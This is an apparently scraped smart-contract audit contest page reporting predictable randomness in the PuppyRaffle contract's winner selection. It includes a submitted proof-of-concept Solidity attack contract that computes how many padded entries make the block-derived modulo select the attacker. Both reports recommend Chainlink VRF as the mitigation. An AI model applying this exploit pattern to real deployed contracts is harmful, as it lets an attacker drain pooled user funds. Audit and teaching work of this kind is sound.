Randomness can be gamed — miner controls winner selection via block parameters
Title: Randomness can be gamed — miner controls winner selection via block parameters
Impact: High — Miner deterministically wins every raffle.
Likelihood: Medium — Requires miner participation.
Reference Files: src/PuppyRaffle.sol:128-129
Description:
Description
selectWinner() derives randomness from values the miner controls, allowing them to compute the outcome before including the transaction. The vulnerable code:
A miner who is also a player can choose block parameters to make themselves the winner.
Risk
Impact: High. Miner deterministically wins every raffle. All other players pay entrance fees with zero chance.
Likelihood: Medium. Requires miner to also be a raffle participant. Feasible on chains where validators run MEV strategies.
A miner can simulate selectWinner() with different timestamps, then include the transaction only when the outcome favors their address.
Proof of Concept
The attacker computes exactly how many extra entries are needed so the modulo lands on their address.
Recommended Mitigation
Use Chainlink VRF for externally-generated randomness:
VRF generates randomness off-chain with cryptographic proof that miners cannot manipulate.
Lead Judging Commences
[H-03] Randomness can be gamed
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.